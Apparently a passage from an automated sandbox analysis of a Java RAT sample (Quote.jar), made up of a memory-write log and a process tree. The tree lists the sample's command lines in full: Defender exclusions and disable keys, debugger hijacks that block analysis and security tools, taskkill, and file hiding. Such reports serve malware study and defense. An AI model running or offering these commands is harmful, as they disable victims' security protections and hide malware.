wrote to memory of 400 1476 cmd.exe 196 PID 1476 wrote to memory of 400 1476 cmd.exe 196 PID 1476 wrote to memory of 400 1476 cmd.exe 196 PID 112 wrote to memory of 1768 112 java.exe 197 PID 112 wrote to memory of 1768 112 java.exe 197 PID 112 wrote to memory of 1768 112 java.exe 197 PID 1768 wrote to memory of 1128 1768 cmd.exe 198 PID 1768 wrote to memory of 1128 1768 cmd.exe 198 PID 1768 wrote to memory of 1128 1768 cmd.exe 198 PID 1768 wrote to memory of 1864 1768 cmd.exe 199 PID 1768 wrote to memory of 1864 1768 cmd.exe 199 PID 1768 wrote to memory of 1864 1768 cmd.exe 199 PID 112 wrote to memory of 1576 112 java.exe 200 PID 112 wrote to memory of 1576 112 java.exe 200 PID 112 wrote to memory of 1576 112 java.exe 200 PID 1576 wrote to memory of 316 1576 cmd.exe 201 PID 1576 wrote to memory of 316 1576 cmd.exe 201 PID 1576 wrote to memory of 316 1576 cmd.exe 201 PID 1576 wrote to memory of 1852 1576 cmd.exe 202 PID 1576 wrote to memory of 1852 1576 cmd.exe 202 PID 1576 wrote to memory of 1852 1576 cmd.exe 202 PID 112 wrote to memory of 1840 112 java.exe 203 PID 112 wrote to memory of 1840 112 java.exe 203 PID 112 wrote to memory of 1840 112 java.exe 203 PID 1840 wrote to memory of 1372 1840 cmd.exe 204 PID 1840 wrote to memory of 1372 1840 cmd.exe 204 PID 1840 wrote to memory of 1372 1840 cmd.exe 204 PID 1840 wrote to memory of 1256 1840 cmd.exe 205 PID 1840 wrote to memory of 1256 1840 cmd.exe 205 PID 1840 wrote to memory of 1256 1840 cmd.exe 205 PID 112 wrote to memory of 1600 112 java.exe 206 PID 112 wrote to memory of 1600 112 java.exe 206 PID 112 wrote to memory of 1600 112 java.exe 206 PID 112 wrote to memory of 1464 112 java.exe 207 PID 112 wrote to memory of 1464 112 java.exe 207 PID 112 wrote to memory of 1464 112 java.exe 207 PID 1464 wrote to memory of 1672 1464 cmd.exe 208 PID 1464 wrote to memory of 1672 1464 cmd.exe 208 PID 1464 wrote to memory of 1672 1464 cmd.exe 208 PID 1464 wrote to memory of 2016 1464 cmd.exe 210 PID 1464 wrote to memory of 2016 1464 cmd.exe 210 PID 1464 wrote to memory of 2016 1464 cmd.exe 210 PID 112 wrote to memory of 2032 112 java.exe 211 PID 112 wrote to memory of 2032 112 java.exe 211 PID 112 wrote to memory of 2032 112 java.exe 211 PID 2032 wrote to memory of 1756 2032 cmd.exe 212 PID 2032 wrote to memory of 1756 2032 cmd.exe 212 PID 2032 wrote to memory of 1756 2032 cmd.exe 212 PID 2032 wrote to memory of 832 2032 cmd.exe 213 PID 2032 wrote to memory of 832 2032 cmd.exe 213 PID 2032 wrote to memory of 832 2032 cmd.exe 213 PID 112 wrote to memory of 1744 112 java.exe 214 PID 112 wrote to memory of 1744 112 java.exe 214 PID 112 wrote to memory of 1744 112 java.exe 214 PID 1744 wrote to memory of 1964 1744 cmd.exe 215 PID 1744 wrote to memory of 1964 1744 cmd.exe 215 PID 1744 wrote to memory of 1964 1744 cmd.exe 215 PID 1744 wrote to memory of 812 1744 cmd.exe 216 PID 1744 wrote to memory of 812 1744 cmd.exe 216 PID 1744 wrote to memory of 812 1744 cmd.exe 216 PID 112 wrote to memory of 1548 112 java.exe 217 PID 112 wrote to memory of 1548 112 java.exe 217 PID 112 wrote to memory of 1548 112 java.exe 217 PID 1548 wrote to memory of 1152 1548 cmd.exe 218 PID 1548 wrote to memory of 1152 1548 cmd.exe 218 PID 1548 wrote to memory of 1152 1548 cmd.exe 218 PID 1548 wrote to memory of 400 1548 cmd.exe 219 PID 1548 wrote to memory of 400 1548 cmd.exe 219 PID 1548 wrote to memory of 400 1548 cmd.exe 219 PID 112 wrote to memory of 460 112 java.exe 220 PID 112 wrote to memory of 460 112 java.exe 220 PID 112 wrote to memory of 460 112 java.exe 220 PID 460 wrote to memory of 476 460 cmd.exe 221 PID 460 wrote to memory of 476 460 cmd.exe 221 PID 460 wrote to memory of 476 460 cmd.exe 221 PID 460 wrote to memory of 300 460 cmd.exe 222 PID 460 wrote to memory of 300 460 cmd.exe 222 PID 460 wrote to memory of 300 460 cmd.exe 222 PID 112 wrote to memory of 2040 112 java.exe 223 PID 112 wrote to memory of 2040 112 java.exe 223 PID 112 wrote to memory of 2040 112 java.exe 223 PID 2040 wrote to memory of 316 2040 cmd.exe 224 PID 2040 wrote to memory of 316 2040 cmd.exe 224 PID 2040 wrote to memory of 316 2040 cmd.exe 224 PID 2040 wrote to memory of 1120 2040 cmd.exe 225 PID 2040 wrote to memory of 1120 2040 cmd.exe 225 PID 2040 wrote to memory of 1120 2040 cmd.exe 225 PID 112 wrote to memory of 1832 112 java.exe 226 PID 112 wrote to memory of 1832 112 java.exe 226 PID 112 wrote to memory of 1832 112 java.exe 226 PID 1832 wrote to memory of 1504 1832 cmd.exe 227 PID 1832 wrote to memory of 1504 1832 cmd.exe 227 PID 1832 wrote to memory of 1504 1832 cmd.exe 227 PID 1832 wrote to memory of 1632 1832 cmd.exe 228 PID 1832 wrote to memory of 1632 1832 cmd.exe 228 PID 1832 wrote to memory of 1632 1832 cmd.exe 228 PID 112 wrote to memory of 1772 112 java.exe 229 PID 112 wrote to memory of 1772 112 java.exe 229 PID 112 wrote to memory of 1772 112 java.exe 229 PID 1772 wrote to memory of 1920 1772 cmd.exe 230 PID 1772 wrote to memory of 1920 1772 cmd.exe 230 PID 1772 wrote to memory of 1920 1772 cmd.exe 230 PID 1772 wrote to memory of 2004 1772 cmd.exe 231 PID 1772 wrote to memory of 2004 1772 cmd.exe 231 PID 1772 wrote to memory of 2004 1772 cmd.exe 231 PID 112 wrote to memory of 1872 112 java.exe 232 PID 112 wrote to memory of 1872 112 java.exe 232 PID 112 wrote to memory of 1872 112 java.exe 232 PID 1872 wrote to memory of 440 1872 cmd.exe 233 PID 1872 wrote to memory of 440 1872 cmd.exe 233 PID 1872 wrote to memory of 440 1872 cmd.exe 233 PID 1872 wrote to memory of 1488 1872 cmd.exe 234 PID 1872 wrote to memory of 1488 1872 cmd.exe 234 PID 1872 wrote to memory of 1488 1872 cmd.exe 234 PID 112 wrote to memory of 1232 112 java.exe 235 PID 112 wrote to memory of 1232 112 java.exe 235 PID 112 wrote to memory of 1232 112 java.exe 235 PID 1232 wrote to memory of 1072 1232 cmd.exe 236 PID 1232 wrote to memory of 1072 1232 cmd.exe 236 PID 1232 wrote to memory of 1072 1232 cmd.exe 236 PID 1232 wrote to memory of 1392 1232 cmd.exe 237 PID 1232 wrote to memory of 1392 1232 cmd.exe 237 PID 1232 wrote to memory of 1392 1232 cmd.exe 237 PID 112 wrote to memory of 1836 112 java.exe 238 PID 112 wrote to memory of 1836 112 java.exe 238 PID 112 wrote to memory of 1836 112 java.exe 238 PID 1836 wrote to memory of 1896 1836 cmd.exe 239 PID 1836 wrote to memory of 1896 1836 cmd.exe 239 PID 1836 wrote to memory of 1896 1836 cmd.exe 239 PID 1836 wrote to memory of 1408 1836 cmd.exe 240 PID 1836 wrote to memory of 1408 1836 cmd.exe 240 PID 1836 wrote to memory of 1408 1836 cmd.exe 240 PID 112 wrote to memory of 1756 112 java.exe 241 PID 112 wrote to memory of 1756 112 java.exe 241 PID 112 wrote to memory of 1756 112 java.exe 241 PID 112 wrote to memory of 1880 112 java.exe 242 PID 112 wrote to memory of 1880 112 java.exe 242 PID 112 wrote to memory of 1880 112 java.exe 242 PID 1756 wrote to memory of 1556 1756 cmd.exe 243 PID 1756 wrote to memory of 1556 1756 cmd.exe 243 PID 1756 wrote to memory of 1556 1756 cmd.exe 243 PID 1756 wrote to memory of 1152 1756 cmd.exe 245 PID 1756 wrote to memory of 1152 1756 cmd.exe 245 PID 1756 wrote to memory of 1152 1756 cmd.exe 245 PID 112 wrote to memory of 1660 112 java.exe 246 PID 112 wrote to memory of 1660 112 java.exe 246 PID 112 wrote to memory of 1660 112 java.exe 246 PID 1660 wrote to memory of 300 1660 cmd.exe 247 PID 1660 wrote to memory of 300 1660 cmd.exe 247 PID 1660 wrote to memory of 300 1660 cmd.exe 247 PID 1660 wrote to memory of 1748 1660 cmd.exe 248 PID 1660 wrote to memory of 1748 1660 cmd.exe 248 PID 1660 wrote to memory of 1748 1660 cmd.exe 248 PID 112 wrote to memory of 1120 112 java.exe 249 PID 112 wrote to memory of 1120 112 java.exe 249 PID 112 wrote to memory of 1120 112 java.exe 249 PID 1120 wrote to memory of 1256 1120 cmd.exe 250 PID 1120 wrote to memory of 1256 1120 cmd.exe 250 PID 1120 wrote to memory of 1256 1120 cmd.exe 250 PID 1120 wrote to memory of 1400 1120 cmd.exe 251 PID 1120 wrote to memory of 1400 1120 cmd.exe 251 PID 1120 wrote to memory of 1400 1120 cmd.exe 251 PID 112 wrote to memory of 2012 112 java.exe 252 PID 112 wrote to memory of 2012 112 java.exe 252 PID 112 wrote to memory of 2012 112 java.exe 252 PID 2012 wrote to memory of 1920 2012 cmd.exe 253 PID 2012 wrote to memory of 1920 2012 cmd.exe 253 PID 2012 wrote to memory of 1920 2012 cmd.exe 253 PID 2012 wrote to memory of 1116 2012 cmd.exe 254 PID 2012 wrote to memory of 1116 2012 cmd.exe 254 PID 2012 wrote to memory of 1116 2012 cmd.exe 254 PID 112 wrote to memory of 1508 112 java.exe 255 PID 112 wrote to memory of 1508 112 java.exe 255 PID 112 wrote to memory of 1508 112 java.exe 255 PID 1508 wrote to memory of 1488 1508 cmd.exe 256 PID 1508 wrote to memory of 1488 1508 cmd.exe 256 PID 1508 wrote to memory of 1488 1508 cmd.exe 256 PID 1508 wrote to memory of 2040 1508 cmd.exe 257 PID 1508 wrote to memory of 2040 1508 cmd.exe 257 PID 1508 wrote to memory of 2040 1508 cmd.exe 257 PID 112 wrote to memory of 1872 112 java.exe 258 PID 112 wrote to memory of 1872 112 java.exe 258 PID 112 wrote to memory of 1872 112 java.exe 258 PID 1872 wrote to memory of 1240 1872 cmd.exe 259 PID 1872 wrote to memory of 1240 1872 cmd.exe 259 PID 1872 wrote to memory of 1240 1872 cmd.exe 259 PID 1872 wrote to memory of 1772 1872 cmd.exe 260 PID 1872 wrote to memory of 1772 1872 cmd.exe 260 PID 1872 wrote to memory of 1772 1872 cmd.exe 260 PID 112 wrote to memory of 1364 112 java.exe 261 PID 112 wrote to memory of 1364 112 java.exe 261 PID 112 wrote to memory of 1364 112 java.exe 261 PID 1364 wrote to memory of 1576 1364 cmd.exe 262 PID 1364 wrote to memory of 1576 1364 cmd.exe 262 PID 1364 wrote to memory of 1576 1364 cmd.exe 262 PID 1364 wrote to memory of 1608 1364 cmd.exe 263 PID 1364 wrote to memory of 1608 1364 cmd.exe 263 PID 1364 wrote to memory of 1608 1364 cmd.exe 263 PID 112 wrote to memory of 1876 112 java.exe 264 PID 112 wrote to memory of 1876 112 java.exe 264 PID 112 wrote to memory of 1876 112 java.exe 264 PID 1876 wrote to memory of 324 1876 cmd.exe 265 PID 1876 wrote to memory of 324 1876 cmd.exe 265 PID 1876 wrote to memory of 324 1876 cmd.exe 265 PID 1876 wrote to memory of 1476 1876 cmd.exe 266 PID 1876 wrote to memory of 1476 1876 cmd.exe 266 PID 1876 wrote to memory of 1476 1876 cmd.exe 266 PID 112 wrote to memory of 1172 112 java.exe 267 PID 112 wrote to memory of 1172 112 java.exe 267 PID 112 wrote to memory of 1172 112 java.exe 267 PID 1172 wrote to memory of 684 1172 cmd.exe 268 PID 1172 wrote to memory of 684 1172 cmd.exe 268 PID 1172 wrote to memory of 684 1172 cmd.exe 268 PID 1172 wrote to memory of 568 1172 cmd.exe 269 PID 1172 wrote to memory of 568 1172 cmd.exe 269 PID 1172 wrote to memory of 568 1172 cmd.exe 269 PID 112 wrote to memory of 1688 112 java.exe 270 PID 112 wrote to memory of 1688 112 java.exe 270 PID 112 wrote to memory of 1688 112 java.exe 270 PID 1688 wrote to memory of 1472 1688 cmd.exe 271 PID 1688 wrote to memory of 1472 1688 cmd.exe 271 PID 1688 wrote to memory of 1472 1688 cmd.exe 271 PID 1688 wrote to memory of 1392 1688 cmd.exe 272 PID 1688 wrote to memory of 1392 1688 cmd.exe 272 PID 1688 wrote to memory of 1392 1688 cmd.exe 272 PID 112 wrote to memory of 1468 112 java.exe 273 PID 112 wrote to memory of 1468 112 java.exe 273 PID 112 wrote to memory of 1468 112 java.exe 273 PID 1468 wrote to memory of 1896 1468 cmd.exe 274 PID 1468 wrote to memory of 1896 1468 cmd.exe 274 PID 1468 wrote to memory of 1896 1468 cmd.exe 274 PID 1468 wrote to memory of 832 1468 cmd.exe 275 PID 1468 wrote to memory of 832 1468 cmd.exe 275 PID 1468 wrote to memory of 832 1468 cmd.exe 275 PID 112 wrote to memory of 2008 112 java.exe 276 PID 112 wrote to memory of 2008 112 java.exe 276 PID 112 wrote to memory of 2008 112 java.exe 276 PID 2008 wrote to memory of 1556 2008 cmd.exe 277 PID 2008 wrote to memory of 1556 2008 cmd.exe 277 PID 2008 wrote to memory of 1556 2008 cmd.exe 277 PID 2008 wrote to memory of 1864 2008 cmd.exe 278 PID 2008 wrote to memory of 1864 2008 cmd.exe 278 PID 2008 wrote to memory of 1864 2008 cmd.exe 278 PID 112 wrote to memory of 1128 112 java.exe 279 PID 112 wrote to memory of 1128 112 java.exe 279 PID 112 wrote to memory of 1128 112 java.exe 279 PID 1128 wrote to memory of 1740 1128 cmd.exe 280 PID 1128 wrote to memory of 1740 1128 cmd.exe 280 PID 1128 wrote to memory of 1740 1128 cmd.exe 280 PID 1128 wrote to memory of 1544 1128 cmd.exe 281 PID 1128 wrote to memory of 1544 1128 cmd.exe 281 PID 1128 wrote to memory of 1544 1128 cmd.exe 281 PID 112 wrote to memory of 812 112 java.exe 282 PID 112 wrote to memory of 812 112 java.exe 282 PID 112 wrote to memory of 812 112 java.exe 282 PID 812 wrote to memory of 316 812 cmd.exe 283 PID 812 wrote to memory of 316 812 cmd.exe 283 PID 812 wrote to memory of 316 812 cmd.exe 283 PID 812 wrote to memory of 1504 812 cmd.exe 284 PID 812 wrote to memory of 1504 812 cmd.exe 284 PID 812 wrote to memory of 1504 812 cmd.exe 284 PID 112 wrote to memory of 1256 112 java.exe 285 PID 112 wrote to memory of 1256 112 java.exe 285 PID 112 wrote to memory of 1256 112 java.exe 285 PID 1256 wrote to memory of 992 1256 cmd.exe 286 PID 1256 wrote to memory of 992 1256 cmd.exe 286 PID 1256 wrote to memory of 992 1256 cmd.exe 286 PID 1256 wrote to memory of 1212 1256 cmd.exe 287 PID 1256 wrote to memory of 1212 1256 cmd.exe 287 PID 1256 wrote to memory of 1212 1256 cmd.exe 287 PID 112 wrote to memory of 1116 112 java.exe 288 PID 112 wrote to memory of 1116 112 java.exe 288 PID 112 wrote to memory of 1116 112 java.exe 288 PID 1116 wrote to memory of 1492 1116 cmd.exe 289 PID 1116 wrote to memory of 1492 1116 cmd.exe 289 PID 1116 wrote to memory of 1492 1116 cmd.exe 289 PID 1116 wrote to memory of 1956 1116 cmd.exe 290 PID 1116 wrote to memory of 1956 1116 cmd.exe 290 PID 1116 wrote to memory of 1956 1116 cmd.exe 290 PID 112 wrote to memory of 676 112 java.exe 291 PID 112 wrote to memory of 676 112 java.exe 291 PID 112 wrote to memory of 676 112 java.exe 291 PID 112 wrote to memory of 2032 112 java.exe 293 PID 112 wrote to memory of 2032 112 java.exe 293 PID 112 wrote to memory of 2032 112 java.exe 293 PID 2032 wrote to memory of 1608 2032 cmd.exe 294 PID 2032 wrote to memory of 1608 2032 cmd.exe 294 PID 2032 wrote to memory of 1608 2032 cmd.exe 294 PID 2032 wrote to memory of 324 2032 cmd.exe 295 PID 2032 wrote to memory of 324 2032 cmd.exe 295 PID 2032 wrote to memory of 324 2032 cmd.exe 295 PID 112 wrote to memory of 1844 112 java.exe 296 PID 112 wrote to memory of 1844 112 java.exe 296 PID 112 wrote to memory of 1844 112 java.exe 296 PID 1844 wrote to memory of 684 1844 cmd.exe 297 PID 1844 wrote to memory of 684 1844 cmd.exe 297 PID 1844 wrote to memory of 684 1844 cmd.exe 297 PID 1844 wrote to memory of 1936 1844 cmd.exe 298 PID 1844 wrote to memory of 1936 1844 cmd.exe 298 PID 1844 wrote to memory of 1936 1844 cmd.exe 298 PID 112 wrote to memory of 764 112 java.exe 299 PID 112 wrote to memory of 764 112 java.exe 299 PID 112 wrote to memory of 764 112 java.exe 299 PID 764 wrote to memory of 1392 764 cmd.exe 300 PID 764 wrote to memory of 1392 764 cmd.exe 300 PID 764 wrote to memory of 1392 764 cmd.exe 300 PID 764 wrote to memory of 1600 764 cmd.exe 301 PID 764 wrote to memory of 1600 764 cmd.exe 301 PID 764 wrote to memory of 1600 764 cmd.exe 301 PID 112 wrote to memory of 1380 112 java.exe 302 PID 112 wrote to memory of 1380 112 java.exe 302 PID 112 wrote to memory of 1380 112 java.exe 302 PID 1380 wrote to memory of 1152 1380 cmd.exe 303 PID 1380 wrote to memory of 1152 1380 cmd.exe 303 PID 1380 wrote to memory of 1152 1380 cmd.exe 303 PID 1380 wrote to memory of 1556 1380 cmd.exe 304 PID 1380 wrote to memory of 1556 1380 cmd.exe 304 PID 1380 wrote to memory of 1556 1380 cmd.exe 304 PID 112 wrote to memory of 1972 112 java.exe 305 PID 112 wrote to memory of 1972 112 java.exe 305 PID 112 wrote to memory of 1972 112 java.exe 305 PID 1972 wrote to memory of 1176 1972 cmd.exe 306 PID 1972 wrote to memory of 1176 1972 cmd.exe 306 PID 1972 wrote to memory of 1176 1972 cmd.exe 306 PID 1972 wrote to memory of 1544 1972 cmd.exe 307 PID 1972 wrote to memory of 1544 1972 cmd.exe 307 PID 1972 wrote to memory of 1544 1972 cmd.exe 307 PID 112 wrote to memory of 1672 112 java.exe 308 PID 112 wrote to memory of 1672 112 java.exe 308 PID 112 wrote to memory of 1672 112 java.exe 308 PID 112 wrote to memory of 1488 112 java.exe 310 PID 112 wrote to memory of 1488 112 java.exe 310 PID 112 wrote to memory of 1488 112 java.exe 310 PID 112 wrote to memory of 1608 112 java.exe 312 PID 112 wrote to memory of 1608 112 java.exe 312 PID 112 wrote to memory of 1608 112 java.exe 312 PID 112 wrote to memory of 1244 112 java.exe 314 PID 112 wrote to memory of 1244 112 java.exe 314 PID 112 wrote to memory of 1244 112 java.exe 314 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1576 attrib.exe 1608 attrib.exe 1956 attrib.exe 1152 attrib.exe 2036 attrib.exe 2040 attrib.exe 2020 attrib.exe 528 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Quote.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1660
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1576
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1608
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1956
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1152
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2036
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2040
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2020
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\FVKwo\WbZqr.class2⤵
- Views/modifies file attributes
PID:528
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:460
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\FVKwo','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\FVKwo\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1072
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:828
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1472
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1188
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:812
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1012
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1464
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1764
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1836
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1892
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1604
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1396
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1492
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1776
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1744
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1240
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1368
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1752
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1864
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1408
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1372
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1884
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1908
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1860
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:300
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1608
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:676
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1688
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1736
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1244
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1872
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1120
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1172
-
-
